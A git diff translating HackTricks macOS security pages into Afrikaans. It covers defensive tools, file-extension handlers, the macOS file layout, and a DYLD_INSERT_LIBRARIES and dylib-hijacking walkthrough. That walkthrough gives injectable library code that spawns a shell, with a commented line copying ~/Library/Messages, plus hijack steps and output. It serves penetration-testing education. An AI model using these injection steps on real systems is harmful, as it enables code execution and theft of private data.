-## Firewalls +## Vuurmuur -* [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): It will monitor every connection made by each process. Depending on the mode (silent allow connections, silent deny connection and alert) it will **show you an alert** every time a new connection is stablished. It also has a very nice GUI to see all this information. -* [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See firewall. This is a basic firewall that will alert you for suspicious connections (it has a GUI but it isn't as fancy as the one of Little Snitch). +* [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): Dit sal elke verbinding wat deur elke proses gemaak word, monitor. Afhangende van die modus (stil toelaat van verbindinge, stil ontkenning van verbindinge en waarskuwing), sal dit **'n waarskuwing wys** elke keer as 'n nuwe verbinding tot stand gebring word. Dit het ook 'n baie mooi GUI om al hierdie inligting te sien. +* [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See-vuurmuur. Dit is 'n basiese vuurmuur wat jou sal waarsku vir verdagte verbindinge (dit het 'n GUI, maar dit is nie so luuks soos dié van Little Snitch nie). -## Persistence detection +## Volharding opsporing -* [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See application that will search in several locations where **malware could be persisting** (it's a one-shot tool, not a monitoring service). -* [**BlockBlock**](https://objective-see.org/products/blockblock.html): Like KnockKnock by monitoring processes that generate persistence. +* [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See-toepassing wat sal soek na verskeie plekke waar **malware volharding kan hê** (dit is 'n eenmalige instrument, nie 'n moniteringsdiens nie). +* [**BlockBlock**](https://objective-see.org/products/blockblock.html): Soos KnockKnock deur prosesse te monitor wat volharding genereer. -## Keyloggers detection +## Sleutelloggers opsporing -* [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps" +* [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See-toepassing om **sleutelloggers** op te spoor wat sleutelbord "gebeurtenis-aftastings" installeer. -## Ransomware detection +## Ransomware opsporing -* [**RansomWhere**](https://objective-see.org/products/ransomwhere.html): Objective-See application to detect **file encryption** actions. +* [**RansomWhere**](https://objective-see.org/products/ransomwhere.html): Objective-See-toepassing om **lêerversleuteling**-aksies op te spoor. -## Mic & Webcam detection +## Mikrofoon & Webkamera opsporing -* [**OverSight**](https://objective-see.org/products/oversight.html): Objective-See application to detect **application that starts using webcam and mic.** +* [**OverSight**](https://objective-see.org/products/oversight.html): Objective-See-toepassing om **toepassings wat die webkamera en mikrofoon begin gebruik** op te spoor. -## Process Injection detection +## Prosessinspuiting opsporing -* [**Shield**](https://theevilbit.github.io/shield/): Applicaiton that **detects different process injection** techniques. +* [**Shield**](https://theevilbit.github.io/shield/): Toepassing wat **verskillende prosessinspuitingstegnieke opspoor**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md index 444104441..ce7329661 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -2,22 +2,21 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## DYLD\_INSERT\_LIBRARIES Basic example - -**Library to inject** to execute a shell: +## DYLD\_INSERT\_LIBRARIES Basiese voorbeeld +**Biblioteek om in te spuit** om 'n skul te voer: ```c // gcc -dynamiclib -o inject.dylib inject.c @@ -29,35 +28,30 @@ __attribute__((constructor)) void myconstructor(int argc, const char **argv) { - syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); - printf("[+] dylib injected in %s\n", argv[0]); - execv("/bin/bash", 0); - //system("cp -r ~/Library/Messages/ /tmp/Messages/"); +syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); +printf("[+] dylib injected in %s\n", argv[0]); +execv("/bin/bash", 0); +//system("cp -r ~/Library/Messages/ /tmp/Messages/"); } ``` - -Binary to attack: - +Binêre teiken: ```c // gcc hello.c -o hello #include int main() { - printf("Hello, World!\n"); - return 0; +printf("Hello, World!\n"); +return 0; } ``` - -Injection: - +Injeksie: ```bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello ``` +## Dyld Hijacking Voorbeeld -## Dyld Hijacking Example - -The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. +Die teiken kwesbare binêre lêer is `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. {% tabs %} {% tab title="entitlements" %} @@ -71,13 +65,13 @@ The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources ```bash # Check where are the @rpath locations otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2 - cmd LC_RPATH - cmdsize 32 - path @loader_path/. (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/. (offset 12) -- - cmd LC_RPATH - cmdsize 32 - path @loader_path/../lib2 (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/../lib2 (offset 12) ``` {% endcode %} {% endtab %} @@ -87,9 +81,9 @@ otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RP ```bash # Check librareis loaded using @rapth and the used versions otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3 - name @rpath/lib.dylib (offset 24) - time stamp 2 Thu Jan 1 01:00:02 1970 - current version 1.0.0 +name @rpath/lib.dylib (offset 24) +time stamp 2 Thu Jan 1 01:00:02 1970 +current version 1.0.0 compatibility version 1.0.0 # Check the versions ``` @@ -97,13 +91,12 @@ compatibility version 1.0.0 {% endtab %} {% endtabs %} -With the previous info we know that it's **not checking the signature of the loaded libraries** and it's **trying to load a library from**: +Met die vorige inligting weet ons dat dit **nie die handtekening van die gelaai biblioteke nagaan nie** en dit probeer 'n biblioteek laai vanaf: * `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib` * `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib` -However, the first one doesn't exist: - +Maar, die eerste een bestaan nie: ```bash pwd /Applications/VulnDyld.app @@ -111,8 +104,7 @@ pwd find ./ -name lib.dylib ./Contents/Resources/lib2/lib.dylib ``` - -So, it's possible to hijack it! Create a library that **executes some arbitrary code and exports the same functionalities** as the legit library by reexporting it. And remember to compile it with the expected versions: +So, dit is moontlik om dit te kap! Skep 'n biblioteek wat **willekeurige kode uitvoer en dieselfde funksionaliteit uitvoer** as die regte biblioteek deur dit weer uit te voer. En onthou om dit te kompileer met die verwagte weergawes: {% code title="lib.m" %} ```objectivec @@ -120,12 +112,12 @@ So, it's possible to hijack it! Create a library that **executes some arbitrary __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"[+] dylib hijacked in %s", argv[0]); +NSLog(@"[+] dylib hijacked in %s", argv[0]); } ``` {% endcode %} -Compile it: +Kompileer dit: {% code overflow="wrap" %} ```bash @@ -134,28 +126,28 @@ gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Found ``` {% endcode %} -The reexport path created in the library is relative to the loader, lets change it for an absolute path to the library to export: +Die heruitvoerpad wat in die biblioteek geskep word, is relatief tot die laaier. Laat ons dit verander na 'n absolute pad na die biblioteek wat uitgevoer moet word: {% code overflow="wrap" %} ```bash #Check relative otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 48 - name @rpath/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 48 +name @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib # Check again otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 128 - name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 128 +name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) ``` {% endcode %} -Finally just copy it to the **hijacked location**: +Uiteindelik kopieer dit net na die **gekaapte plek**: {% code overflow="wrap" %} ```bash @@ -163,35 +155,33 @@ cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib" ``` {% endcode %} -And **execute** the binary and check the **library was loaded**: +En **voer** die binêre lêer uit en kontroleer of die **biblioteek gelaai is**: 
"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
-2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
-Usage: [...]
+2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib gekaap in /Applications/VulnDyld.app/Contents/Resources/lib/binary
+Gebruik: [...]
{% hint style="info" %} -A nice writeup about how to abuse this vulnerability to abuse the camera permissions of telegram can be found in [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) +'n Goeie bespreking oor hoe om hierdie kwesbaarheid te misbruik om die kamera-toestemmings van Telegram te misbruik, kan gevind word by [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) {% endhint %} -## Bigger Scale - -If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution). +## Groter Skala +As jy van plan is om biblioteke in onverwagte binêre lêers in te spuit, kan jy die gebeurtenisboodskappe ondersoek om uit te vind wanneer die biblioteek binne 'n proses gelaai word (in hierdie geval verwyder die printf en die `/bin/bash` uitvoering). ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"' ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md index cb98171c6..f26ac5d31 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md @@ -1,80 +1,74 @@ -# macOS File Extension & URL scheme app handlers +# macOS Lêeruitbreiding & URL-skema-apphanteraars
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## File Extension & URL scheme app handlers - -The following line can be useful to find the applications that can open files depending on the extension: +## Lêeruitbreiding & URL-skema-apphanteraars +Die volgende lyn kan nuttig wees om die toepassings te vind wat lêers kan oopmaak afhangende van die uitbreiding: ```bash /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E "path:|bindings:|name:" ``` - -Or use something like [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): - +Of gebruik iets soos [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): ```bash ./swda getSchemes #Get all the available schemes ./swda getApps #Get all the apps declared ./swda getUTIs #Get all the UTIs ./swda getHandler --URL ftp #Get ftp handler ``` - -You can also check the extensions supported by an application doing: - +Jy kan ook die uitbreidings wat deur 'n toepassing ondersteun word, nagaan deur die volgende te doen: ``` cd /Applications/Safari.app/Contents grep -A3 CFBundleTypeExtensions Info.plist | grep string - css - pdf - webarchive - webbookmark - webhistory - webloc - download - safariextz - gif - html - htm - js - jpg - jpeg - jp2 - txt - text - png - tiff - tif - url - ico - xhtml - xht - xml - xbl - svg +css +pdf +webarchive +webbookmark +webhistory +webloc +download +safariextz +gif +html +htm +js +jpg +jpeg +jp2 +txt +text +png +tiff +tif +url +ico +xhtml +xht +xml +xbl +svg ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 25a0ee260..e7e529a15 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -1,96 +1,96 @@ -# macOS Files, Folders, Binaries & Memory +# macOS Lêers, Vouers, Binêre & Geheue
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## File hierarchy layout +## Lêerhiërargie-uitleg -* **/Applications**: The installed apps should be here. All the users will be able to access them. -* **/bin**: Command line binaries -* **/cores**: If exists, it's used to store core dumps -* **/dev**: Everything is treated as a file so you may see hardware devices stored here. -* **/etc**: Configuration files -* **/Library**: A lot of subdirectories and files related to preferences, caches and logs can be found here. A Library folder exists in root and on each user's directory. -* **/private**: Undocumented but a lot of the mentioned folders are symbolic links to the private directory. -* **/sbin**: Essential system binaries (related to administration) -* **/System**: File fo making OS X run. You should find mostly only Apple specific files here (not third party). -* **/tmp**: Files are deleted after 3 days (it's a soft link to /private/tmp) -* **/Users**: Home directory for users. -* **/usr**: Config and system binaries -* **/var**: Log files -* **/Volumes**: The mounted drives will apear here. -* **/.vol**: Running `stat a.txt` you obtain something like `16777223 7545753 -rw-r--r-- 1 username wheel ...` where the first number is the id number of the volume where the file exists and the second one is the inode number. You can access the content of this file through /.vol/ with that information running `cat /.vol/16777223/7545753` +* **/Applications**: Die geïnstalleerde programme moet hier wees. Alle gebruikers sal daartoe toegang hê. +* **/bin**: Opdraglyn-binêre +* **/cores**: As dit bestaan, word dit gebruik om kernaflewerings te stoor +* **/dev**: Alles word as 'n lêer hanteer, sodat jy hardewaretoestelle hier kan sien. +* **/etc**: Konfigurasie-lêers +* **/Library**: 'n Groot aantal subgids en lêers wat verband hou met voorkeure, cache en logboeke kan hier gevind word. 'n Library-gids bestaan in die wortel en in elke gebruiker se gids. +* **/private**: Onbeskryf, maar baie van die genoemde vouers is simboliese skakels na die private-gids. +* **/sbin**: Essensiële stelsel-binêre (verwant aan administrasie) +* **/System**: Lêer om OS X te laat loop. Jy moet meestal net Apple-spesifieke lêers hier vind (nie van derde party nie). +* **/tmp**: Lêers word na 3 dae uitgewis (dit is 'n sagte skakel na /private/tmp) +* **/Users**: Tuisgids vir gebruikers. +* **/usr**: Konfigurasie- en stelsel-binêre +* **/var**: Loglêers +* **/Volumes**: Die gemonteerde aandrywings sal hier verskyn. +* **/.vol**: Deur `stat a.txt` uit te voer, verkry jy iets soos `16777223 7545753 -rw-r--r-- 1 gebruikersnaam wiel ...` waar die eerste nommer die id-nommer van die volume is waar die lêer bestaan en die tweede een die inode-nommer is. Jy kan die inhoud van hierdie lêer benader deur /.vol/ met daardie inligting uit te voer `cat /.vol/16777223/7545753` -### Applications Folders +### Toepassingsvouers -* **System applications** are located under `/System/Applications` -* **Installed** applications are usually installed in `/Applications` or in `~/Applications` -* **Application data** can be found in `/Library/Application Support` for the applications running as root and `~/Library/Application Support` for applications running as the user. -* Third-party applications **daemons** that **need to run as root** as usually located in `/Library/PrivilegedHelperTools/` -* **Sandboxed** apps are mapped into the `~/Library/Containers` folder. Each app has a folder named according to the application’s bundle ID (`com.apple.Safari`). -* The **kernel** is located in `/System/Library/Kernels/kernel` -* **Apple's kernel extensions** are located in `/System/Library/Extensions` -* **Third-party kernel extensions** are stored in `/Library/Extensions` +* **Stelseltoepassings** is geleë onder `/System/Applications` +* **Geïnstalleerde** toepassings word gewoonlik geïnstalleer in `/Applications` of in `~/Applications` +* **Toepassingsdata** kan gevind word in `/Library/Application Support` vir toepassings wat as root uitgevoer word en `~/Library/Application Support` vir toepassings wat as die gebruiker uitgevoer word. +* Derdeparty-toepassings **daemons** wat **as root moet loop**, is gewoonlik geleë in `/Library/PrivilegedHelperTools/` +* **Gesandbokseerde** programme word gekarteer na die `~/Library/Containers`-gids. Elke toepassing het 'n gids met die naam van die toepassing se bundel-ID (`com.apple.Safari`). +* Die **kernel** is geleë in `/System/Library/Kernels/kernel` +* **Apple se kernel-uitbreidings** is geleë in `/System/Library/Extensions` +* **Derdeparty-kernel-uitbreidings** word gestoor in `/Library/Extensions` -### Files with Sensitive Information +### Lêers met Sensitiewe Inligting -MacOS stores information such as passwords in several places: +MacOS stoor inligting soos wagwoorde op verskeie plekke: {% content-ref url="macos-sensitive-locations.md" %} [macos-sensitive-locations.md](macos-sensitive-locations.md) {% endcontent-ref %} -### Vulnerable pkg installers +### Kwesbare pkg-installeerders {% content-ref url="macos-installers-abuse.md" %} [macos-installers-abuse.md](macos-installers-abuse.md) {% endcontent-ref %} -## OS X Specific Extensions +## OS X Spesifieke Uitbreidings -* **`.dmg`**: Apple Disk Image files are very frequent for installers. -* **`.kext`**: It must follow a specific structure and it's the OS X version of a driver. (it's a bundle) -* **`.plist`**: Also known as property list stores information in XML or binary format. - * Can be XML or binary. Binary ones can be read with: - * `defaults read config.plist` - * `/usr/libexec/PlistBuddy -c print config.plsit` - * `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` - * `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` - * `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` -* **`.app`**: Apple applications that follows directory structure (It's a bundle). -* **`.dylib`**: Dynamic libraries (like Windows DLL files) -* **`.pkg`**: Are the same as xar (eXtensible Archive format). The installer command can be use to install the contents of these files. -* **`.DS_Store`**: This file is on each directory, it saves the attributes and customisations of the directory. -* **`.Spotlight-V100`**: This folder appears on the root directory of every volume on the system. -* **`.metadata_never_index`**: If this file is at the root of a volume Spotlight won't index that volume. -* **`.noindex`**: Files and folder with this extension won't be indexed by Spotlight. +* **`.dmg`**: Apple Disk Image-lêers is baie algemeen vir installeerders. +* **`.kext`**: Dit moet 'n spesifieke struktuur volg en dit is die OS X-weergawe van 'n bestuurder. (Dit is 'n bundel) +* **`.plist`**: Ook bekend as eienskapslys, stoor inligting in XML- of binêre formaat. +* Dit kan XML of binêre wees. Binêre eenhede kan gelees word met: +* `defaults read config.plist` +* `/usr/libexec/PlistBuddy -c print config.plsit` +* `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` +* `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` +* `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` +* **`.app`**: Apple-toepassings wat die gidsstruktuur volg (Dit is 'n bundel). +* **`.dylib`**: Dinamiese biblioteke (soos Windows DLL-lêers) +* **`.pkg`**: Dit is dieselfde as xar (eXtensible Archive-formaat). Die installer-opdrag kan gebruik word om die inhoud van hierdie lêers te installeer. +* **`.DS_Store`**: Hierdie lêer is in elke gids, dit stoor die eienskappe en aanpassings van die gids. +* **`.Spotlight-V100`**: Hierdie vouer verskyn op die wortelgids van elke volume op die stelsel. +* **`.metadata_never_index`**: As hierdie lêer aan die wortel van 'n volume is, sal Spotlight daardie volume nie indeks nie. +* **`.noindex`**: Lêers en vouers met hierdie uitbreiding sal nie deur Spotlight geïndekseer word nie. -### macOS Bundles +### macOS-bundels -A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files). +'n Bundel is 'n **gids** wat **lyk soos 'n voorwerp in Finder** ('n voorbeeld van 'n 